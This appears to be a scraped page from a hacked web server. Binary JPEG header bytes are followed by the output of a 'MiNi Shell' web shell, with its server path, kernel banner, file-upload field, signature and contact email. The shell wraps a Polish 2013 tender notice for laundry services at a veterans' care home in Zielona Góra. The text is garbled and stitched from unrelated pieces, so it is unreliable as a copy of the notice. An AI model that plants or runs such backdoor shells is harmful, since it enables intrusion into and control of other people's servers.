JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131127/486446-N-2013.html

<p class="kh_header"><b>Zielona Góra: usługi pralnicze dla Domu Pomocy Społecznej dla Kombatantów im. Jana Lembasa przy  ul. Lubuskiej 11 w Zielonej Górze</b><br>
<b>Numer ogłoszenia: 486446 - 2013; data zamieszczenia: 27.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Kombatantów im. Jana Lembasa , ul. Lubuska 11, 65-265 Zielona Góra, woj. lubuskie, tel. 068 3270838, faks 068 3270838.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dpskombatant.w.interia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa urzędu miasta.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi pralnicze dla Domu Pomocy Społecznej dla Kombatantów im. Jana Lembasa przy  ul. Lubuskiej 11 w Zielonej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje :
3.2.1.usługę pralniczą dla Domu Pomocy Społecznej dla Kombatantów    z zachowaniem właściwego reżimu sanitarnego, w szczególności:
1)	 przyjmowanie transportem Wykonawcy  oznakowanych worków z brudnym praniem,
2)	dezynfekcja  brudnego prania,
3)	pranie dostarczonego asortymentu,
4)	suszenie dostarczonego asortymentu,
5)	maglowanie i prasowanie dostarczonego asortymentu,
6)	krochmalenie pościeli, serwetek
7)	reperacja np. uzupełnianie guzików, zszycie rozpruć itp,
8)	segregowanie, składanie i pakowanie do worków czystego prania oraz dostarczanie transportem  Wykonawcy do siedziby  Zamawiającego 

3.2.1.1.Zakres usługi, o której mowa  w pkt   3.2.1. SIWZ  obejmuje:
1)	odbiór prania brudnego codziennie przez 5 dni roboczych ( od poniedziałku do piątku)  według asortymentu  bezpośrednio z pomieszczenia wyznaczonego przez Zamawiającego   od godz. 10:00 do godz. 13:00,
2)	załadunek  brudnego prania,
3)	pranie z dezynfekcją bez użycia chloru, środki bezzapachowe, 
4)	krochmalenie, maglowanie i prasowanie w zależności od asortymentu,
5)	dostarczenie czystego prania nie  może przekroczyć 48 godzin (w dni robocze) do godz. 13:00,
6)	czyste pranie ma być zapakowane w worki  oddzielnie wg asortymentu,
7)	Wykonawca kwituje odbiór  prania ilościowo  wg asortymentu oraz segregowane na  poszczególne oddziały : Pawilon A, Pawilon B, Pawilon C, Pawilon D, opiekunowie, pokojowe  i kuchnia,
8)	odbiór czystego prania odbywać się będzie w obecności pracownika Wykonawcy i pracownika Zamawiającego za pokwitowaniem.

3.2.1.2. Szczegółowy opis asortymentu zawiera tabela ( wykaz asortymentu prania ) stanowiąca załącznik
           Nr 6 do SIWZ. 
     
         Zabrudzone rzeczy do prania np. wymiocinami, kałem będą pakowane do osobnego worka i odpowiednio opisywane.

3.3.  Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia z należytą starannością  oraz zgodnie z  wymaganiami  sanitarno-epidemiologicznymi. 
3.4.   Środki użyte do prania muszą posiadać odpowiednie świadectwa i atesty PZH.
3.5.  Pranie ma być odbierane i  dostarczane środkiem transportu zgodnym z  wymaganiami sanitarno-  epidemiologicznymi na koszt Wykonawcy.
3.6.     Za załadunek i wyładunek brudnego i czystego  prania  odpowiedzialny jest Wykonawca. 
3.7. Odbiór czystego prania odbywać się będzie w miejscu wyznaczonym przez        Zamawiającego, gdzie pracownik potwierdzi na piśmie przyjęcie czystego prania, co będzie  podstawą   uzyskania zapłaty za  wykonanie usługi.
3.8. W przypadku  zniszczenia danego asortymentu prania (m.in. podarte, pofarbowane, sfilcowane, rozciągnięte, przypalone prasowaniem lub maglowaniem, pozahaczane itp), Wykonawca zobowiązany będzie do zwrotu kosztów poniesionych przez Zamawiającego za zakup nowego asortymentu  na wymianę. 
3.9.   Wykonawca w przypadku dostarczenia prania czystego nie będącego własnością Zamawiającego wymieni  je w ciągu 24 godzin od powiadomienia pracownika jednostki.
3.10.   Odbiór prania brudnego odbywać się będzie codziennie przez 5 dni roboczych ( od poniedziałku  do piątku) według asortymentu bezpośrednio z pomieszczenia wyznaczonego przez Zamawiającego  od  godz.10:00 do godz.13:00.
3.11. Czynności zdawczo-odbiorcze odbywać się będą między Stronami za potwierdzeniem na  dokumentach sporządzonych wg ustalonych wzorów przez Strony.
3.12.   Termin wykonania każdorazowej usługi prania nie może przekroczyć 48 godzin ( np. pranie odebrane   13.01.2013r. wraca do Zamawiającego najpóźniej do 15.01.2013.) za wyjątkiem prania odbieranego w  piątek, które będzie przywiezione w poniedziałek.
3.13.  Płatność za wykonanie przedmiotu umowy nastąpi przelewem w okresach miesięcznych, na  podstawie faktur częściowych  w terminie 14 dni, od daty jej złożenia  w siedzibie Zamawiającego.     
3.14. Zamawiający zastrzega sobie możliwość zmniejszenia ilości asortymentu prania w zależności od potrzeb Zamawiającego i  nie ponosi konsekwencji za zmniejszenie ilości brudnego prania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
         Za spełnienie warunku posiadania niezbędnej wiedzy i doświadczenia Zamawiający uzna wykazanie, że w okresie  ostatnich trzech lat przed upływem terminu  składania ofert do udziału w postępowaniu , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał lub wykonuje  minimum   dwa zadania o minimalnej wartości 60.000,00 zł brutto każde w zakresie  usług pralniczych potwierdzone dowodami,  że została wykonana  lub jest  wykonywana należycie.
          Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu usług i przedłożonych przez Wykonawcę poświadczeń/innych dokumentów wg zasady spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz oferty wg załącznika Nr 1 do SIWZ;
2)	pisemne zobowiązanie, o którym mowa w pkt  5.2. SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
3)	dowodami, o których mowa w wykazie usług jest poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
-  	Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać
    	poświadczenia, jako dowód traktowane będą również inne dokumenty.
    W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w  wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
-   		W razie konieczności, szczególnie gdy wykaz lub dowody budzą wątpliwości Zamawiającego lub gdy 
z poświadczenia albo innego dokumentu wynika, że zamówienie nie zostało lub zostało wykonane
nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub  dokumentów bezpośrednio Zamawiającemu;
- 		Wykonawca w miejsce poświadczeń, o których mowa powyżej może przedkładać dokumenty  potwierdzające należyte wykonanie usług  określone w  rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od  wykonawcy   oraz form w jakich te dokumenty mogą być składane (Dz.U. nr 226, poz. 1817);
4)	dokument , z którego wynika upoważnienie osoby/osób do podpisania oferty w imieniu Wykonawcy      lub pełnomocnictwo do reprezentowania Wykonawcy składa się w formie oryginału lub kopii poświadczonej przez notariusza, o ile nie wynika to z innych dokumentów załączonych do oferty przez Wykonawcę;
5)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w myśl art.23 ustawy pzp, należy dostarczyć :
-   	pełnomocnictwo do reprezentowania wszystkich Wykonawców. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia. Zamawiający dopuszcza  złożenie przedmiotowego  dokumentu w formie oryginału   lub kopii poświadczonej przez notariusza,
- 	dokumenty składane w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust.1       ustawy pzp, dotyczące  Wykonawców wspólnie ubiegających się o udzielenie zamówienia winien        złożyć   każdy z Wykonawców wspólnie ubiegających się o zamówienie,
-  	informację o przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5 ustawy pzp składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
6)      Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce       zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie dotyczącym dokumentów       podmiotów zagranicznych, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także  osoby uprawnione do reprezentacji Wykonawcy, złożone   przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym  Wykonawca ma siedzibę lub miejsce  zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed  upływem  terminu składania ofert.
7)       W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących 
 przedłożonego dokumentu.
8)    W przypadku podmiotów wspólnie ubiegających się o udzielenie o udzielenie zamówienia oraz w
przypadku innych podmiotów, na zasobach, których Wykonawca polega na zasadach określonych w 
art. 26 ust.2b ustawy pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
6.5.   Wymienione dokumenty i oświadczenia  muszą być załączone do oferty.
6.6. Składane dokumenty muszą być w formie oryginału lub kopii poświadczonej za zgodność
z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy.
6.7. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu 
wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
6.8.  W przypadku dokumentów, sporządzonych w języku obcym, należy je złożyć wraz z tłumaczeniem na 
język polski.
6.9.   Jeżeli Wykonawca załączy dokumenty , gdzie podane zostały wartości kwotowe wyrażone w walutach innych niż zloty polski, zostaną one przeliczone wg Tabeli A kursów średnich walut obcych Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 
6.10.  Z treści dokumentów i oświadczeń , o których mowa w SIWZ musi wynikać jednoznacznie, iż postawione przez Zamawiającego warunki i wymagania zostały spełnione.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dopuszczalne zmiany zgodne z siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dpskombatant.w.interia.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Lubuska 11, 65 - 265 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2013 godzina 10:00, miejsce: ul. Lubuska 11, 65 - 265 Zielona Góra, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com